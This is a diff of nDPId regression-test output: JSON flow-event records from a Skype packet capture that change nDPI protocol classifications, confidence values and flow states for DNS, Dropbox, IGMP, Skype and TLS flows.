+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969712913,"flow_last_seen":1431969712913,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":49485,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431969712918,"flow_last_seen":1431969747557,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777184,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642398,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969789851,"flow_last_seen":1431969789851,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969751302,"flow_last_seen":1431969751302,"flow_idle_time":620000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665006,"flow_last_seen":1431969665006,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969664357,"flow_last_seen":1431969789358,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969712913,"flow_last_seen":1431969714738,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54067,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969712913,"flow_last_seen":1431969714738,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54067,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969641947,"flow_last_seen":1431969668369,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969641948,"flow_last_seen":1431969668369,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777185,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":86,"flow_first_seen":1431969719110,"flow_last_seen":1431969765415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15522,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969641947,"flow_last_seen":1431969668369,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969641948,"flow_last_seen":1431969668369,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431969657029,"flow_last_seen":1431969777185,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2510,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1431969656652,"flow_last_seen":1431969807022,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":3012,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1431969719110,"flow_last_seen":1431969765415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15522,"flow_avg_l4_payload_len":180,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":50128,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} 00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431969707326,"flow_last_seen":1431969717500,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":347,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":50103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969677975,"flow_last_seen":1431969704363,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49360,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969713815,"flow_last_seen":1431969726847,"flow_idle_time":200000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969722958,"flow_last_seen":1431969740384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50130,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -1191,15 +1191,15 @@ 00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431969713736,"flow_last_seen":1431969714165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50110,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431969774806,"flow_last_seen":1431969776480,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50140,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969717949,"flow_last_seen":1431969723488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50125,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969717949,"flow_last_seen":1431969750910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":3826,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.23","src_port":50126,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969719561,"flow_last_seen":1431969727878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":50129,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 